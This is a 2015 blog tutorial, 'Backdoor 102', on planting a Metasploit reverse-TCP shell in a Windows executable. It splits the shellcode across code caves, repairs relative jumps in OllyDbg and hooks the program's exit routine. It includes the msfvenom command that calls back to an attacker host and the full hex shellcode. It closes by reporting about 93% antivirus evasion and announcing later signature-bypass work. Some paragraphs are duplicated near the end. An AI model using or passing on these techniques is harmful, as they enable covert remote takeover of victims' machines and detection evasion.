Backdoor 102
Note: this post was created on September 2015
Introduction
This episode of Backdoor will consider the idea of analysing shell code to find areas which can be easily split into multiple smaller pieces of shell code. This will allow a larger piece of shell code to be split easily into smaller pieces that will then require minimal adjustments to ensure that it works. In this particular instance, we will not be focusing our efforts to increasing the evasion rate of the back door — that will be discussed in a later episode.
Shell code generated by msfvenom uses relative short jumps so careless splitting of the shell code can lead to the code crashing. In order to overcome this issue, we will take the shell code generated and analyse the different branches within the shell code to further our understanding of its operation.
This tutorial will cover shell code splitting and how to test to ensure that the shell code’s original functionality has not been modified.
A quick preview of what to expect before reading the rest of the post is described by the diagram below.
Setting up the environment
If we refer to Backdoor 101, we will recall the environment set up section of the tutorial. This is intended to be similar so if you already know how to set it up, you can skip ahead to the following section.
In our test environment, we have two virtual machines set up. The first virtual machine will be running Sana, Kali Linux 2.0. The second machine will be running Windows 7. For more information on virtual machine setup instructions, please refer to another dedicated guide [1]. Both machines will be configured to use Network Address Translation (NAT) as opposed to Bridge mode. The reason why we chose this is for compatibility. Often, VMWare does not allow bridging onto wireless networks.
Once the two machines are booted, we need to firstly check the IP addresses allocated. In the Linux machine we can run the ifconfig command and on the Windows machine we can run ipconfig.
The following image shows ifconfig being run on the Kali Linux environment and reveals the IP address allocated to it by DHCP. An aware reader may notice that the IP for my attacking machine has changed since the last tutorial, that is fine.
On the windows machine, the ipconfig command should be used and this is observed by the following screenshot.
Therefore, we now know that the network set up can be visualised by the following diagram. The machine that we are running our virtual machines on is the host which is likely to be behind a firewall. Your machine will have its own internal IP address which is not listed in the following diagram — this was removed to simplify the diagram. To add to this, the host uses VMWare to create its own virtual space of the 192.168.1.1./24 range. This means that we will have all the IP addresses from 192.168.1.1 to 192.168.1.254. This can be configured to other settings to restrict the number of possible IP addresses if required; this will not be covered in this tutorial.
It is trivial in VMWare to create multiple instances through duplication for further testing and it is recommended. Shell code that works on 32 bit systems may not work on 64 bit systems so testing is required. In my tutorials, I will be mainly focusing on only 32 bit executables. Later, I will be writing one tutorial for the readers who are interested in 64 bit PE infection.
Basic shell code analysis
In the process of splitting the shell code, it is often a lot easier if we take the shell code and analyse the sections it has first. Therefore, by inputting the shell code into The Online Disassembler [2] (ODA), we can visualise the code using a graph view. We are using ODA as opposed to IDA Pro or any other similar tools due to the fact that readers will not need to download the tool or encounter any licensing issues. ODA provides a quick and easy way tool for us to obtain the information and analysis that we need out of it. We make use of the graph visualisation capabilities of ODA to better understand the flow of execution in the shell code.
The first step is to generate the shell code for the reverse TCP stager to be analysed through the following command. As we can see, in LHOST we must put our attacker machine that we want the shell code to create a connection to connect back to. The LPORT value of 443 is configured due to common firewalls allowing egress on port 443.
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.133 LPORT=443 -f hex
At this point, you may be trying to notice the change in shell code at one specific byte in the shell code due to the change from the last octet used in the previous tutorial being 0x82 instead of 0x85.
To analyse the given shell code, take the shell code and paste it into The Online Disassembler. Other tools such as IDA Pro may be used but in this instance we will focus on using this web based tool. The following image displays the box that the shell code should be placed into and the assembly parsed and displayed by the tool.
Clicking on the “graph” button displays the following graph. We can interpret this graph by understanding that the shell code is actually in chunks. “While” loops, are one type of loops often used in programming. These loops can be translated into assembly as conditional jump operations. Jumps are required to redirect execution flow to different sections of code in order to allow branching. Basically what the graph display does is split the code into appropriate jump sections and allows us to now visualise the different sections available. It is theoretically possible to split a shell code of n instructions into n code caves. This may be extreme but can put off a lot more antivirus (AV) scans due the requirement of signatures. A later tutorial will be created to provide analysts some insight to generating signatures for tools such as YARA [3] — the pattern matching Swiss knife for malware researchers.
By this point, I hope that we can appreciate the basic operations and can understand how the shell code is split into sections by its logical nature. It is important to ensure that when we split the code, that the jumps within each code cave jump back to the correct instructions in respective caves. Jump operations in assembly make use of relative bytes to move forwards or backwards. It does not take into account the exact address or location of the shell code. In the original shell code that is generated, it makes use of relative jumps. Therefore, if we place the section of code which contains a jump, it will not be able to jump correctly using the hardcoded relative bytes. Venom was not created with the ability of allowing shell code splitting in mind. It merely generates a shell code which will run on a target operating system that can perform a task within a minimal defined space.
To understand how the jumps are being used in assembly, the remaining of this section will be aimed towards understanding the code flow. If you are already familiar with code flow tracing, you can skip to the next section.
The following screenshot takes the beginning of the shell code visualisation up to a jump and its destination.
If we take notice of the top section of code, there is a blue arrow coming out of it but no other arrow. This indicates that the disassembler is accommodating for a jump back from a future section of code (indicated by the green arrow on the far right coming into the top section).
Moving on, if we look at the second chunk of code, we can see that there is a red arrow followed by one instruction and then another arrow coming out into a larger section. On the right of these two smaller arrows, we can see there is a larger green arrow which also points to the same destination. Both of the flows go to the same point in code, but is branched on condition. At the end of the chunk of code we can see a **JL operation code **(op-code) which means “jump if less” — a branching condition.
We will choose to split this section of the code. The red line across the following image displays the separation line. If there are two jumps in which it crosses over, it indicates that there are three initial branches we need to fix after splitting.
As we have previously learned, we need to pay extra attention to the “jump if less than” branch displayed below.
Recalling the extra jump back to the first section of code on the further right hand side, we can scroll down to see where that jump is. The highlighted green arrow below displays this happening and where the root of the jump is. This concludes the section. Keeping the points that we have analysed and found in mind, we can continue onto splitting the shell code.
Splitting the code
To split the code into separate code caves, it is important for us to see how much space is needed for each code cave. Code caves are explained in the first episode of the series. This tutorial will not go over how to search for code caves again. To find out how many bytes these instructions translate to and to provide extra bytes for contingency, switch back over to the dis-assembly view in ODA. Taking the shell code we can split it into these two consequent sections displayed below.
After splitting the above shell code, it equates to the following two stream of bytes.
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20 c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd56a0568c0a8018568020001bb89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8610000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d225868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c24e971ffffff01c329c675c7c3bbf0b5a2566a0053ffd5
To know how many bytes we need for either code cave, we can just find out the length of the code and divide it by 2 (2 digits per byte). Therefore we get lengths of 37 and 296. This is shown below.
However, if we recall from the first tutorial, we must perform the following:
Store the registers
Store the flags
Shell code
Align stack
Restore flags
Restore registers
Fix execution flow and follow it
Therefore, we need extra bytes. I would just add 10 bytes on top of each code cave size for contingency. Therefore we have two caves of sizes 47 and 306 respectively.
Labelling in Ollydbg
The act of labeling in Ollydbg allows us to enjoy the ease of referencing addresses. We can name address points to easily assemble. You will be able to understand why we are doing this later on in the tutorial when it will be used in the next section. Trust me that it is not a time waster for now. Please do not use the exact same addresses for code caves as me. Code cave one actually corrupts the original data and the program crashes. It is important that you find two safe code caves for usage. It may take some time and experimentation before finding two working code caves. The code caves below were not my final cave addresses.
Take the first code cave and give it the label of **cc1. **The following image displays this.
Do the same with the second code cave **using cc2 **as displayed in the following image.
Now that we have both of the code caves in place, we can begin placing it into the appropriate places and fix the references between them, ending this section.
Injecting into OnExit
Following on from the previous tutorial, we can locate an appropriate location on the exit procedural flow. This will not be covered in this guide and it will be assumed that you have found an appropriate injection point and understood how to align and fix the procedural flow.
Label the point of injection as orig as displayed in the following screenshot. Label the return point as returnpoint.
Let us jump to the first section of the code cave. Type space or right click the point of injection and click assemble.
If the previous sections were completed and labelled correctly — the following displayed assembly will work.
Pressing assemble will then produce the following result as shown below.
If we type enter with the line of code selected, we can follow the code into our code cave. Another way to perform this is by right clicking -> follow. After doing so, you will be directed to a view similar to below.
Filling in code cave one
As we mentioned previously, we have the two snippets of split code now.
We can paste the first of the two shell code snippets into the first smaller code cave of at least 47 bytes. Before we do this, we need to save the registers and flags.
Assemble the following code into the code cave as displayed below.
After performing this step, we can begin assembling our first part of the shell code. Firstly, copy the shell code into your clip board as hex. Secondly, highlight a large number of lines then right click -> binary -> binary paste. The following screenshot visualises this process.
In a normal scenario, the code after **sub al, 20 **will follow directly into the next command in the code that will be located in code cave two. However, the code caves are no longer one whole section of code and therefore will require manual assistance in directing it to the next code cave. Therefore, we resolve this issue with a jump operation. Assemble a jump to the next code cave as displayed below.
We can confirm that this is directed correctly by pressing enter. This will then put us in code cave two range.
Filling in code cave two
We do not need to save the registers and flags in this case because we have already done so previously in the beginning of the previous code cave. Now following the previous method, highlight multiple lines and paste in the shell code. Make sure that enough lines are highlighted as it will only overwrite those that are selected and will not insert.
The following screenshot displays the beginning of the shell code injected.
At the end of the shell code, we need to align, restore our instructions, flags and registers then fix the damaged code and jump back. The screenshot below demonstrates theses fixes.
Following the final jump, we should return back to the original point. It is important to test and ensure that these vital jumps are redirecting the code to the correct locations. We must save the code first before continuing with the correction of all the other location relative jumps and calls within the code so that we are executing the correct code at all times.
In this tutorial, I reverted to Ollydbg 1.1.0 and I can use right click -> copy -> select all displayed below.
Followed by a right click -> copy to executable.
You may be required to save each code section change one at a time. Therefore, you can save a few different executables. Ollydbg does not allow you to copy all changes in the entire executable.
After saving the binary, restart the executable and ensure that all the breakpoints are in place. We will break on the orig point and step through the code to identify jump and call operations that are using relative locations to addresses as operands. Operands are the parameters used with an operation code.
At this point, a run of the executable crashes. This is not normal. Therefore, we go back to further testing and realise that the code inserted into code cave one was not safe.
Therefore, we need to go through the original process again and find a safe section for code cave one to be used. In the tutorial, I will not go over this again as the process is the same, demonstrated by the following diagram of flow. This is explained by the following diagram. This is the same as the diagram at the beginning of the post and has been re-used to help with the explanation.
Fixing relative location operands
In this section of the tutorial, I will be demonstrating the fixing of relative locations. I will go through the explanation of how to fix operations which use relative addressing through a detailed process. The tutorial will also include a section on how to step through the shell code to ensure that all the operations that use operands which contain relative locations are referring to the correct locations.
To be able to fix this, we need to understand how the location of the instruction to be called is calculated. By understanding the call, we can see the bytes E8 82000000. The byte **E8 **is the operation code for call relative location. The bytes 82000000, is in little endian and actually resolves to 82 in hex -> 130 decimal. Therefore, we know the instruction that will get called is 130 bytes after the address displayed after the next instruction. The calculation performed is 0x0047B4B2 + 0xE8 = 0x0047B534. Therefore, we can conclude that this is correct. However, now that the second part of the shell code is shifted into another region, the 0xE8 offset no longer applies. Therefore, we need to find the offset that we need to call that calls the same instruction as before it was split.
Referring back to ODA, we can see what instruction actually exists at the current offset of +0x82. The following image shows the call and by clicking on the address, it will redirect us.
The subsequent illustration shows the landing point after clicking on the address. From seeing the highlighted instruction, we can see that the computer is being instructed to perform a pop ebp next.
The subsequent illustration shows the landing point after clicking on the address. From seeing the highlighted instruction, we can see that the computer is being instructed to perform a pop ebp next.
The next step that we need to perform is to locate the exact instruction offset from code cave one in the second code cave. Time for a handy trick! First we can see that pop ebpis located at an offset of 0x88 from the start of the code. If we now take the start of our code cave 2 instruction ror edi, 0xD located at 0x25, we can find the difference. 0x88–0x25 = 0x63. Double clicking on Ollydbg at the start of code cave two, sets its offset to 0x00 and creates a relative location counter for us. This is displayed below.
Now by scrolling down to a displacement of $+0x63, we find pop ebp located at the global offset of 0x0047B85F. This address will differ depending on where your second code cave is located. The following screenshot should provide better understanding.
Now that we are at the correct location, we can set a label for easier recognition. For example, I will set the label to be call1loc. This is shown below.
Ultimately, we now have the location we know that we were originally trying to call if we had not split the shell code. To resolve this issue of the shell code having an incorrect relative location, we can return to the call in code cave one. After doing so, we need to assemble the call as call call1loc and Ollydbg will automatically recall the address we had given the label call1loc and work out the offset required to call it. The next section will continue the process of discovery and patching operations with relative addressing.
Discovering the rest
Before we start this section, a quick tip for checking where jumps or calls go to is to use the enter key or right click -> follow. This was previously mentioned. However, there is also the minus key or right click -> go to -> previous which will take you back to where you were before pressing enter. This is useful as we can trace code through every relative operation with ease by going back and forth.
Now that after fixing all of the relative operations in code cave one, it is necessary to fix all of those in code cave two. To do so, we need to go through every operation in code cave two that uses an operand that is a relative location. By doing this, we need to confirm that the relative location is either:
In code cave one
In code cave two
Jump back the original return point
In code cave two, we can see that the loop command also uses relative addressing. However, this one loops exactly to 0x1e. We can see this as well as the address it loops to the address located at 0x1e which was a **lods al, byte ptr ds: [esi] **operation. The following screenshot shows this happening.
To resolve this, we need to target the operand at the **lods al, byte ptr ds: [esi] **in code cave one. Set the label accordingly as looploc on the lods instruction. In this case, we cannot use the referencing and we must calculate the exact bytes ourselves. This is due to the loop working to a maximum of one byte (0–255 decimal). The following screenshot displays the error that is displayed when an attempt to loop to looploc is made.
During this tutorial, I could not find a loop operation code that uses more than one byte. Therefore, I will make use of another small code cave to replicate what a loop would do. The loopd operator performs the following as described in the image.
As we can see, the operator decrements the **ECX **register then jumps if the count is not equal to zero. We can replicate this by first jumping to a code cave as shown in the following screenshot. Ensure that the third code cave is labelled as cc3 and the instruction following the jump is labelled as cc3ret. It is also important that we take note of the commands replaced and damaged by the no operation (nop) commands.
Following into code cave three, we need to construct the following process to replicate the effect performed by loop:
Decrease counter (ECX) by one
Compare counter to zero
If the counter is not equal to zero, the zero flag is not set -> jump to the original loop destination
Fix the original overwritten operations
Jump back to the original execution path in the shell code
However, we need to ensure that the zero flag (ZF) is not modified hence we push the flags onto the stack and pop them off the stack when we choose to branch before committing to the rest of the execution. This is demonstrated by the following construction.
After fixing this, the code runs fine once again. The next jump that we run into is the one located before call1loc that we allocated earlier. This is highlighted in the image below.
Now we need to find out where the** jump** goes to. By using ODA once again we can see that the jump is going back to code cave one in offset 0x15. The following screenshots display this.
If we now go into Ollydbg and set a label on the endpoint, we can fix the jump as we did earlier on. I have labelled this as omgret. The following screenshots display the labelling as well as the jump fix. However, in this case, the jump fix breaks the code, therefore we will jump into a code cave then fix the execution and jump back in. Since the code already jumps to an empty section, we will make use of it and just jump directly to the omgret.
After exploring and tracing the shell code more thoroughly, it appears that we have finished fixing it! Ensure that everything is saved and ready to be ran for the testing phase.
Testing the back door
From the last tutorial, we already know the process of setting up the handler. Therefore, this episode will not explain these steps. The following screenshot shows the handler being set up.
To continue with the test, we must upload the executable that now has a back door into the victim virtual machine. After doing so, we must execute the payload and press the “X” button to exit and see if we actually get a shell back. With a little bit of luck and lots of skill, we can now go to sleep after seeing the following message.
Results and conclusion
In this section, I will analyse the evasion rate of this new payload. At the beginning of the tutorial, I have stated that this is not aimed towards increasing the evasion rate. The purpose of this tutorial is to enjoy and learn the process of splitting shell code into multiple caves whilst keeping the execution cycle intact.
As I am not fussed about throwing away my techniques to VirusTotal, we can observe some results below. Interestingly enough, the evasion rate has now increased to ~93%. I had just realised that before it was actually 89% evasion rate as I had miscalculated in **Backdoor 101. **This time, we have killed off **two **more antiviruses — Avast and ClamAV. This should not be because of the shell code splitting. The reason why this is most likely the case is due to the code that was modified to split the shell code has now changed the signature. Therefore, Avast and ClamAV’s signature database does not contain our newly changed signatures. In a future tutorial, I will be covering how to create signatures of shell code for tools such as YARA. After we understand the concept of how signatures are created, we can then begin to think of methods to easily bypass signature checking to achieve greater evasion ratios.
Once again, thank you for reading my blog post. I highly value any feedback, recommendations and advice for writing, documentation and research progression as I am still a newbie in the information security industry.
References
[2] https://www.onlinedisassembler.com/
[3] http://plusvic.github.io/yara/
To know how many bytes we need for either code cave, we can just find out the length of the code and divide it by 2 (2 digits per byte). Therefore we get lengths of 37 and 296. This is shown below.
Last updated